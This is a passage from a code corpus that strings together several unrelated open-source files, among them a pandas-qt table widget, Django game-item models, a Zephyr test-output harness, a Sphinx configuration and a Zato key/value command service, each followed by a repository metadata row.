"""
if error.validator == 'type':
return "'{}' is not of type '{}'".format(
error.instance, error.validator_value)
elif error.validator == 'enum':
return "'{}' is not one of ['{}']".format(
error.instance, "','".join(error.validator_value))
elif error.validator == 'required':
if error.message[0:2] == "u'":
return error.message[1:]
return error.message
def _get_detailed_errors(error, depth, absolute_schema_path, absolute_schema,
filter_errors=True):
"""Returns a list of error messages from all subschema validations.
Recurses the error tree and adds one message per sub error. That list can
get long, because jsonschema also tests the hypothesis that the provided
network element type is wrong (e.g. "ovs_bridge" instead of "ovs_bond").
Setting `filter_errors=True` assumes the type, if specified, is correct and
therefore produces a much shorter list of more relevant results.
"""
if not error.context:
return []
sub_errors = error.context
if filter_errors:
if (absolute_schema_path[-1] in ['oneOf', 'anyOf'] and
isinstance(error.instance, collections.Mapping) and
'type' in error.instance):
found, index = _find_type_in_schema_list(
error.validator_value, error.instance['type'])
if found:
sub_errors = [i for i in sub_errors if (
i.schema_path[0] == index)]
details = []
sub_errors = sorted(sub_errors, key=lambda e: e.schema_path)
for sub_error in sub_errors:
schema_path = collections.deque(absolute_schema_path)
schema_path.extend(sub_error.schema_path)
details.append("{} {}: {}".format(
'-' * depth,
_pretty_print_schema_path(schema_path, absolute_schema),
_get_consistent_error_message(sub_error)))
details.extend(_get_detailed_errors(
sub_error, depth + 1, schema_path, absolute_schema,
filter_errors))
return details
def _find_type_in_schema_list(schemas, type_to_find):
"""Finds an object of a given type in an anyOf/oneOf array.
Returns a tuple (`found`, `index`), where `found` indicates whether
on object of type `type_to_find` was found in the `schemas` array.
If so, `index` contains the object's position in the array.
"""
for index, schema in enumerate(schemas):
if not isinstance(schema, collections.Mapping):
continue
if ('$ref' in schema and
schema['$ref'].split('/')[-1] == type_to_find):
return (True, index)
if ('properties' in schema and 'type' in schema['properties'] and
schema['properties']['type'] == type_to_find):
return (True, index)
return (False, 0)
def _pretty_print_schema_path(absolute_schema_path, absolute_schema):
"""Returns a representation of the schema path that's easier to read.
For example:
>>> _pretty_print_schema_path("items/oneOf/0/properties/use_dhcp/oneOf/2")
"items/oneOf/interface/use_dhcp/oneOf/param"
"""
pretty_path = []
current_path = []
current_schema = absolute_schema
for item in absolute_schema_path:
if item not in ["properties"]:
pretty_path.append(item)
current_path.append(item)
current_schema = current_schema[item]
if (isinstance(current_schema, collections.Mapping) and
'$ref' in current_schema):
if (isinstance(pretty_path[-1], int) and
pretty_path[-2] in ['oneOf', 'anyOf']):
pretty_path[-1] = current_schema['$ref'].split('/')[-1]
current_path = current_schema['$ref'].split('/')
current_schema = absolute_schema
for i in current_path[1:]:
current_schema = current_schema[i]
return '/'.join([str(x) for x in pretty_path])
| apache-2.0 | -4,055,297,311,342,866,400 | 38.790055 | 79 | 0.621772 | false |
datalyze-solutions/pandas-qt | pandasqt/views/DataTableView.py | 1 | 13381 | # -*- coding: utf-8 -*-
from pandasqt.compat import QtCore, QtGui, Qt, Slot, Signal
from pandasqt.models.DataFrameModel import DataFrameModel
from pandasqt.views.EditDialogs import AddAttributesDialog, RemoveAttributesDialog
from pandasqt.views.CustomDelegates import createDelegate
from pandasqt.models.mime import PandasCellPayload, MimeData
from pandasqt.models.SupportedDtypes import SupportedDtypes
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
class DragTable(QtGui.QTableView):
def __init__(self, parent=None):
"""create a table view with the ability to start drag operations"""
super(DragTable, self).__init__(parent)
self.setDragEnabled(True)
def startDrag(self, index):
"""start a drag operation with a PandasCellPayload on defined index.
Args:
index (QModelIndex): model index you want to start the drag operation.
"""
if not index.isValid():
return
dataFrame = self.model().dataFrame()
# get all infos from dataFrame
dfindex = dataFrame.iloc[[index.row()]].index
columnName = dataFrame.columns[index.column()]
dtype = dataFrame[columnName].dtype
value = dataFrame[columnName][dfindex]
# create the mime data
mimePayload = PandasCellPayload(
dfindex,
columnName,
value,
dtype,
hex(id(self.model()))
)
mimeData = MimeData()
mimeData.setData(mimePayload)
# create the drag icon and start drag operation
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
pixmap = QtGui.QPixmap(":/icons/insert-table.png")
drag.setHotSpot(QtCore.QPoint(pixmap.width()/3, pixmap.height()/3))
drag.setPixmap(pixmap)
result = drag.start(Qt.MoveAction)
def mouseMoveEvent(self, event):
super(DragTable, self).mouseMoveEvent(event)
self.startDrag(self.indexAt(event.pos()))
class DataTableWidget(QtGui.QWidget):
"""A Custom widget with a TableView and a toolbar.
This widget shall display all `DataFrameModels` and
enable the editing of this (edit data, adding/removing,
rows/columns).
"""
def __init__(self, parent=None, iconSize=QtCore.QSize(36, 36)):
"""Constructs the object with the given parent.
Args:
parent (QObject, optional): Causes the objected to be owned
by `parent` instead of Qt. Defaults to `None`.
iconSize (QSize, optional): Size of edit buttons. Defaults to QSize(36, 36).
"""
super(DataTableWidget, self).__init__(parent)
self._iconSize = iconSize
self.initUi()
def initUi(self):
"""Initalizes the Uuser Interface with all sub widgets.
"""
self.gridLayout = QtGui.QGridLayout(self)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.buttonFrame = QtGui.QFrame(self)
#self.buttonFrame.setMinimumSize(QtCore.QSize(250, 50))
#self.buttonFrame.setMaximumSize(QtCore.QSize(250, 50))
self.buttonFrame.setFrameShape(QtGui.QFrame.NoFrame)
spacerItemButton = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.buttonFrameLayout = QtGui.QGridLayout(self.buttonFrame)
self.buttonFrameLayout.setContentsMargins(0, 0, 0, 0)
self.editButton = QtGui.QToolButton(self.buttonFrame)
self.editButton.setObjectName('editbutton')
self.editButton.setText(self.tr(u'edit'))
self.editButton.setToolTip(self.tr(u'toggle editing mode'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/document-edit.png')))
self.editButton.setIcon(icon)
self.addColumnButton = QtGui.QToolButton(self.buttonFrame)
self.addColumnButton.setObjectName('addcolumnbutton')
self.addColumnButton.setText(self.tr(u'+col'))
self.addColumnButton.setToolTip(self.tr(u'add new column'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-insert-column-right.png')))
self.addColumnButton.setIcon(icon)
self.addRowButton = QtGui.QToolButton(self.buttonFrame)
self.addRowButton.setObjectName('addrowbutton')
self.addRowButton.setText(self.tr(u'+row'))
self.addRowButton.setToolTip(self.tr(u'add new row'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-insert-row-below.png')))
self.addRowButton.setIcon(icon)
self.removeColumnButton = QtGui.QToolButton(self.buttonFrame)
self.removeColumnButton.setObjectName('removecolumnbutton')
self.removeColumnButton.setText(self.tr(u'-col'))
self.removeColumnButton.setToolTip(self.tr(u'remove a column'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-delete-column.png')))
self.removeColumnButton.setIcon(icon)
self.removeRowButton = QtGui.QToolButton(self.buttonFrame)
self.removeRowButton.setObjectName('removerowbutton')
self.removeRowButton.setText(self.tr(u'-row'))
self.removeRowButton.setToolTip(self.tr(u'remove selected rows'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-delete-row.png')))
self.removeRowButton.setIcon(icon)
self.buttons = [self.editButton, self.addColumnButton, self.addRowButton, self.removeColumnButton, self.removeRowButton]
for index, button in enumerate(self.buttons):
button.setMinimumSize(self._iconSize)
button.setMaximumSize(self._iconSize)
button.setIconSize(self._iconSize)
button.setCheckable(True)
self.buttonFrameLayout.addWidget(button, 0, index, 1, 1)
self.buttonFrameLayout.addItem(spacerItemButton, 0, index+1, 1, 1)
for button in self.buttons[1:]:
button.setEnabled(False)
#self.tableView = QtGui.QTableView(self)
self.tableView = DragTable(self)
self.tableView.setAlternatingRowColors(True)
self.tableView.setSortingEnabled(True)
self.gridLayout.addWidget(self.buttonFrame, 0, 0, 1, 1)
self.gridLayout.addWidget(self.tableView, 1, 0, 1, 1)
self.editButton.toggled.connect(self.enableEditing)
self.addColumnButton.toggled.connect(self.showAddColumnDialog)
self.addRowButton.toggled.connect(self.addRow)
self.removeRowButton.toggled.connect(self.removeRow)
self.removeColumnButton.toggled.connect(self.showRemoveColumnDialog)
def setButtonsVisible(self, visible):
"""hide/show the edit buttons"""
self.buttonFrame.setVisible(visible)
@Slot(bool)
def enableEditing(self, enabled):
"""Enable the editing buttons to add/remove rows/columns and to edit the data.
This method is also a slot.
In addition, the data of model will be made editable,
if the `enabled` parameter is true.
Args:
enabled (bool): This flag indicates, if the buttons
shall be activated.
"""
for button in self.buttons[1:]:
button.setEnabled(enabled)
if button.isChecked():
button.setChecked(False)
model = self.tableView.model()
if model is not None:
model.enableEditing(enabled)
@Slot()
def uncheckButton(self):
"""Removes the checked stated of all buttons in this widget.
This method is also a slot.
"""
#for button in self.buttons[1:]:
for button in self.buttons:
# supress editButtons toggled event
button.blockSignals(True)
if button.isChecked():
button.setChecked(False)
button.blockSignals(False)
@Slot(str, object, object)
def addColumn(self, columnName, dtype, defaultValue):
"""Adds a column with the given parameters to the underlying model
This method is also a slot.
If no model is set, nothing happens.
Args:
columnName (str): The name of the new column.
dtype (numpy.dtype): The datatype of the new column.
defaultValue (object): Fill the column with this value.
"""
model = self.tableView.model()
if model is not None:
model.addDataFrameColumn(columnName, dtype, defaultValue)
self.addColumnButton.setChecked(False)
@Slot(bool)
def showAddColumnDialog(self, triggered):
"""Display the dialog to add a column to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the dialog will be created and shown.
"""
if triggered:
dialog = AddAttributesDialog(self)
dialog.accepted.connect(self.addColumn)
dialog.rejected.connect(self.uncheckButton)
dialog.show()
@Slot(bool)
def addRow(self, triggered):
"""Adds a row to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the row will be appended to the end.
"""
if triggered:
model = self.tableView.model()
model.addDataFrameRows()
self.sender().setChecked(False)
@Slot(bool)
def removeRow(self, triggered):
"""Removes a row to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the selected row will be removed
from the model.
"""
if triggered:
model = self.tableView.model()
selection = self.tableView.selectedIndexes()
rows = [index.row() for index in selection]
model.removeDataFrameRows(set(rows))
self.sender().setChecked(False)
@Slot(list)
def removeColumns(self, columnNames):
"""Removes one or multiple columns from the model.
This method is also a slot.
Args:
columnNames (list): A list of columns, which shall
be removed from the model.
"""
model = self.tableView.model()
if model is not None:
model.removeDataFrameColumns(columnNames)
self.removeColumnButton.setChecked(False)
@Slot(bool)
def showRemoveColumnDialog(self, triggered):
"""Display the dialog to remove column(s) from the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the dialog will be created and shown.
"""
if triggered:
model = self.tableView.model()
if model is not None:
columns = model.dataFrameColumns()
dialog = RemoveAttributesDialog(columns, self)
dialog.accepted.connect(self.removeColumns)
dialog.rejected.connect(self.uncheckButton)
dialog.show()
def setViewModel(self, model):
"""Sets the model for the enclosed TableView in this widget.
Args:
model (DataFrameModel): The model to be displayed by
the Table View.
"""
if isinstance(model, DataFrameModel):
self.enableEditing(False)
self.uncheckButton()
selectionModel = self.tableView.selectionModel()
self.tableView.setModel(model)
model.dtypeChanged.connect(self.updateDelegate)
model.dataChanged.connect(self.updateDelegates)
del selectionModel
def setModel(self, model):
"""Sets the model for the enclosed TableView in this widget.
Args:
model (DataFrameModel): The model to be displayed by
the Table View.
"""
self.setViewModel(model)
def model(self):
"""Gets the viewModel"""
return self.view().model()
def viewModel(self):
"""Gets the viewModel"""
return self.view().model()
def view(self):
"""Gets the enclosed TableView
Returns:
QtGui.QTableView: A Qt TableView object.
"""
return self.tableView
def updateDelegate(self, column, dtype):
"""update the delegates for a specific column
Args:
column (int): column index.
dtype (str): data type of column.
"""
# as documented in the setDelegatesFromDtype function
# we need to store all delegates, so going from
# type A -> type B -> type A
# would cause a segfault if not stored.
createDelegate(dtype, column, self.tableView)
def updateDelegates(self):
"""reset all delegates"""
for index, column in enumerate(self.tableView.model().dataFrame().columns):
dtype = self.tableView.model().dataFrame()[column].dtype
self.updateDelegate(index, dtype)
def selectionModel(self):
"""return the table views selectionModel"""
return self.view().selectionModel() | mit | 1,387,420,655,620,008,400 | 33.312821 | 128 | 0.626112 | false |
PeteAndersen/swarfarm | bestiary/models/items.py | 1 | 6510 | from django.contrib.postgres.fields import ArrayField
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.db import models
from django.utils.safestring import mark_safe
from django.utils.text import slugify
from . import base
ESSENCE_MAP = {
'magic': {
'low': 11006,
'mid': 12006,
'high': 13006,
},
'water': {
'low': 11001,
'mid': 12001,
'high': 13001,
},
'fire': {
'low': 11002,
'mid': 12002,
'high': 13002,
},
'wind': {
'low': 11003,
'mid': 12003,
'high': 13003,
},
'light': {
'low': 11004,
'mid': 12004,
'high': 13004,
},
'dark': {
'low': 11005,
'mid': 12005,
'high': 13005,
},
}
class GameItem(models.Model):
CATEGORY_MONSTER = 1
CATEGORY_CURRENCY = 6
CATEGORY_RUNE = 8
CATEGORY_SUMMON_SCROLL = 9
CATEGORY_BOOSTER = 10
CATEGORY_ESSENCE = 11
CATEGORY_MONSTER_PIECE = 12
CATEOGRY_GUILD_MONSTER_PIECE = 19
CATEGORY_RAINBOWMON = 25
CATEGORY_RUNE_CRAFT = 27
CATEGORY_CRAFT_STUFF = 29
CATEGORY_SECRET_DUNGEON = 30
CATEGORY_MATERIAL_MONSTER = 61
CATEGORY_ARTIFACT = 73
CATEGORY_ARTIFACT_CRAFT = 75
CATEGORY_CHOICES = (
(CATEGORY_MONSTER, 'Monster'),
(CATEGORY_CURRENCY, 'Currency'),
(CATEGORY_SUMMON_SCROLL, 'Summoning Scroll'),
(CATEGORY_BOOSTER, 'Booster'),
(CATEGORY_ESSENCE, 'Essence'),
(CATEGORY_MONSTER_PIECE, 'Monster Piece'),
(CATEOGRY_GUILD_MONSTER_PIECE, 'Guild Monster Piece'),
(CATEGORY_RAINBOWMON, 'Rainbowmon'),
(CATEGORY_RUNE_CRAFT, 'Rune Craft'),
(CATEGORY_CRAFT_STUFF, 'Craft Material'),
(CATEGORY_SECRET_DUNGEON, 'Secret Dungeon'),
(CATEGORY_MATERIAL_MONSTER, 'Enhancing Monster'),
(CATEGORY_ARTIFACT, 'Artifact'),
(CATEGORY_ARTIFACT_CRAFT, 'Artifact Craft Material'),
)
com2us_id = models.IntegerField()
category = models.IntegerField(choices=CATEGORY_CHOICES, help_text='Typically corresponds to `item_master_id` field')
name = models.CharField(max_length=200)
icon = models.CharField(max_length=200, blank=True, null=True)
description = models.TextField(blank=True, default='')
slug = models.CharField(max_length=200)
sell_value = models.IntegerField(blank=True, null=True)
class Meta:
unique_together = (
'com2us_id',
'category',
)
ordering = (
'category',
'com2us_id',
)
def __str__(self):
return self.name
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super().save(*args, **kwargs)
def image_tag(self):
if self.icon:
path = static('herders/images/items/' + self.icon)
return mark_safe(f'<img src="{path}" height="42" width="42" loading="lazy" />')
else:
return 'No Image'
class ItemQuantity(models.Model):
# Abstract model for representing quantities of items for various purposes
item = models.ForeignKey(GameItem, on_delete=models.CASCADE)
quantity = models.IntegerField()
def __str__(self):
return f'{self.item.name} - qty. {self.quantity}'
class Meta:
abstract = True
class Building(models.Model, base.Elements):
AREA_GENERAL = 0
AREA_GUILD = 1
AREA_CHOICES = [
(AREA_GENERAL, 'Everywhere'),
(AREA_GUILD, 'Guild Content'),
]
# TODO: Replace these with base.Stats model
STAT_HP = 0
STAT_ATK = 1
STAT_DEF = 2
STAT_SPD = 3
STAT_CRIT_RATE_PCT = 4
STAT_CRIT_DMG_PCT = 5
STAT_RESIST_PCT = 6
STAT_ACCURACY_PCT = 7
MAX_ENERGY = 8
MANA_STONE_STORAGE = 9
MANA_STONE_PRODUCTION = 10
ENERGY_PRODUCTION = 11
ARCANE_TOWER_ATK = 12
ARCANE_TOWER_SPD = 13
STAT_CHOICES = [
(STAT_HP, 'HP'),
(STAT_ATK, 'ATK'),
(STAT_DEF, 'DEF'),
(STAT_SPD, 'SPD'),
(STAT_CRIT_RATE_PCT, 'CRI Rate'),
(STAT_CRIT_DMG_PCT, 'CRI Dmg'),
(STAT_RESIST_PCT, 'Resistance'),
(STAT_ACCURACY_PCT, 'Accuracy'),
(MAX_ENERGY, 'Max. Energy'),
(MANA_STONE_STORAGE, 'Mana Stone Storage'),
(MANA_STONE_PRODUCTION, 'Mana Stone Production Rate'),
(ENERGY_PRODUCTION, 'Energy Production Rate'),
(ARCANE_TOWER_ATK, 'Arcane Tower ATK'),
(ARCANE_TOWER_SPD, 'Arcane Tower SPD'),
]
PERCENT_STATS = [
STAT_HP,
STAT_ATK,
STAT_DEF,
STAT_SPD,
STAT_CRIT_RATE_PCT,
STAT_CRIT_DMG_PCT,
STAT_RESIST_PCT,
STAT_ACCURACY_PCT,
MANA_STONE_PRODUCTION,
ENERGY_PRODUCTION,
ARCANE_TOWER_ATK,
ARCANE_TOWER_SPD,
]
com2us_id = models.IntegerField()
name = models.CharField(max_length=30)
max_level = models.IntegerField()
area = models.IntegerField(choices=AREA_CHOICES, null=True, blank=True)
affected_stat = models.IntegerField(choices=STAT_CHOICES, null=True, blank=True)
element = models.CharField(max_length=6, choices=base.Elements.ELEMENT_CHOICES, blank=True, null=True)
stat_bonus = ArrayField(models.IntegerField(blank=True, null=True))
upgrade_cost = ArrayField(models.IntegerField(blank=True, null=True))
description = models.TextField(null=True, blank=True)
icon_filename = models.CharField(max_length=100, null=True, blank=True)
def image_url(self):
if self.icon_filename:
return mark_safe('<img src="%s" height="42" width="42" loading="lazy" />' % static('herders/images/buildings/' + self.icon_filename))
else:
return 'No Image'
def __str__(self):
return self.name
class Source(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
icon_filename = models.CharField(max_length=100, null=True, blank=True)
farmable_source = models.BooleanField(default=False)
meta_order = models.IntegerField(db_index=True, default=0)
def image_url(self):
if self.icon_filename:
return mark_safe('<img src="%s" height="42" width="42" loading="lazy" />' % static('herders/images/icons/' + self.icon_filename))
else:
return 'No Image'
def __str__(self):
return self.name
class Meta:
ordering = ['meta_order', 'icon_filename', 'name']
| apache-2.0 | -2,082,593,143,098,325,200 | 28.862385 | 145 | 0.601075 | false |
explora26/zephyr | scripts/sanity_chk/harness.py | 1 | 3312 | import re
from collections import OrderedDict
class Harness:
GCOV_START = "GCOV_COVERAGE_DUMP_START"
GCOV_END = "GCOV_COVERAGE_DUMP_END"
FAULTS = [
"Unknown Fatal Error",
"MPU FAULT",
"Kernel Panic",
"Kernel OOPS",
"BUS FAULT",
"CPU Page Fault"
]
def __init__(self):
self.state = None
self.type = None
self.regex = []
self.matches = OrderedDict()
self.ordered = True
self.repeat = 1
self.tests = {}
self.id = None
self.fail_on_fault = True
self.fault = False
self.capture_coverage = False
def configure(self, instance):
config = instance.test.harness_config
self.id = instance.test.id
if "ignore_faults" in instance.test.tags:
self.fail_on_fault = False
if config:
self.type = config.get('type', None)
self.regex = config.get('regex', [] )
self.repeat = config.get('repeat', 1)
self.ordered = config.get('ordered', True)
class Console(Harness):
def handle(self, line):
if self.type == "one_line":
pattern = re.compile(self.regex[0])
if pattern.search(line):
self.state = "passed"
elif self.type == "multi_line":
for r in self.regex:
pattern = re.compile(r)
if pattern.search(line) and not r in self.matches:
self.matches[r] = line
if len(self.matches) == len(self.regex):
# check ordering
if self.ordered:
ordered = True
pos = 0
for k,v in self.matches.items():
if k != self.regex[pos]:
ordered = False
pos += 1
if ordered:
self.state = "passed"
else:
self.state = "failed"
else:
self.state = "passed"
if self.fail_on_fault:
for fault in self.FAULTS:
if fault in line:
self.fault = True
if self.GCOV_START in line:
self.capture_coverage = True
elif self.GCOV_END in line:
self.capture_coverage = False
class Test(Harness):
RUN_PASSED = "PROJECT EXECUTION SUCCESSFUL"
RUN_FAILED = "PROJECT EXECUTION FAILED"
def handle(self, line):
result = re.compile("(PASS|FAIL|SKIP) - (test_)?(.*)")
match = result.match(line)
if match:
name = "{}.{}".format(self.id, match.group(3))
self.tests[name] = match.group(1)
if self.RUN_PASSED in line:
if self.fault:
self.state = "failed"
else:
self.state = "passed"
if self.RUN_FAILED in line:
self.state = "failed"
if self.fail_on_fault:
for fault in self.FAULTS:
if fault in line:
self.fault = True
if self.GCOV_START in line:
self.capture_coverage = True
elif self.GCOV_END in line:
self.capture_coverage = False
| apache-2.0 | 3,593,360,791,085,379,000 | 29.109091 | 66 | 0.485809 | false |
LinkCareServices/period | docs/conf.py | 1 | 8403 | # -*- coding: utf-8 -*-
#
# period documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 10 18:37:45 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
#import os
sys.path.append("../")
from build_scripts.version import get_hg_version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autosummary', 'sphinx.ext.autodoc',
'sphinx.ext.doctest', 'sphinx.ext.viewcode',
'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.graphviz', 'sphinx.ext.inheritance_diagram', ]
todo_include_todos = True
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None),
}
if tags.has('maintenance'):
autodoc_default_flags = []
else:
autodoc_default_flags = ['members', 'undoc-members',
'private-members']
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'period'
copyright = u'Link Care Services'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = get_hg_version()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'armstrong' # 'linfiniti-sphinx-theme' # 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
html_use_index = True
html_use_modindex = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'period'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'period.tex', u'period Documentation',
u'LCS', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'period', u'period Documentation',
[u'LCS'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'period', u'period Documentation',
u'LCS', 'period', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| artistic-2.0 | 6,534,941,978,792,994,000 | 30.829545 | 80 | 0.697132 | false |
alirizakeles/zato | code/zato-server/test/zato/server/service/internal/kvdb/__init__.py | 1 | 2245 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
from traceback import format_exc
# Zato
from zato.common import ZatoException
from zato.common.kvdb import redis_grammar
from zato.server.service.internal import AdminService, AdminSIO
class ExecuteCommand(AdminService):
""" Executes a command against the key/value DB.
"""
class SimpleIO(AdminSIO):
request_elem = 'zato_kvdb_remote_command_execute_request'
response_elem = 'zato_kvdb_remote_command_execute_response'
input_required = ('command',)
output_required = ('result',)
def handle(self):
input_command = self.request.input.command or ''
if not input_command:
msg = 'No command sent'
raise ZatoException(self.cid, msg)
try:
parse_result = redis_grammar.parseString(input_command)
options = {}
command = parse_result.command
parameters = parse_result.parameters if parse_result.parameters else []
if command == 'CONFIG':
options['parse'] = parameters[0]
elif command == 'OBJECT':
options['infotype'] = parameters[0]
response = self.server.kvdb.conn.execute_command(command, *parameters, **options) or ''
if response and command in('KEYS', 'HKEYS', 'HVALS'):
response = unicode(response).encode('utf-8')
elif command in('HLEN', 'LLEN', 'LRANGE', 'SMEMBERS', 'HGETALL'):
response = str(response)
self.response.payload.result = response
except Exception, e:
msg = 'Command parsing error, command:[{}], e:[{}]'.format(input_command, format_exc(e))
self.logger.error(msg)
raise ZatoException(self.cid, msg)
# The data browser will most likely be implemented in a future version
'''
class GetList(AdminService):
""" Returns a list of keys, optionally including their values.
"""
# KEYS, then
# HGETALL
# GET
# LRANGE
# SMEMBERS
'''
| gpl-3.0 | 4,555,896,742,429,259,300 | 30.180556 | 100 | 0.621826 | false |
semplice/quickstart | quickstart/builder.py | 1 | 2423 | # -*- coding: utf-8 -*-
#
# quickstart - Refreshing the GUI world.
# Copyright (C) 2013 Eugenio "g7" Paolantonio
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
from gi.repository import Gtk
class from_file:
""" builder.from_file is a class decorator that will automatically load
the UI file specified in the arguments in a Gtk.Builder object.
A Dynamic dictionary will be created in class.objects. This special dict
gets the UI objects on-the-fly.
The only required parameter is the UI file position.
Usage example:
@quickstart.builder.from_file("./test.glade")
class GUI:
def __init__(self):
self.objects["main_window"].show_all()
The Gtk.Builder object will be created at class.__builder. """
class DynamicObjectsDictionary(dict):
""" A dynamic dictionary! """
def __init__(self, builder):
self.builder = builder
dict.__init__(self)
def __getitem__(self, key):
""" Returns the specified object if it is already in the dictionary,
otherwise gets it from the builder first and then returns it. """
itm = self.get(key)
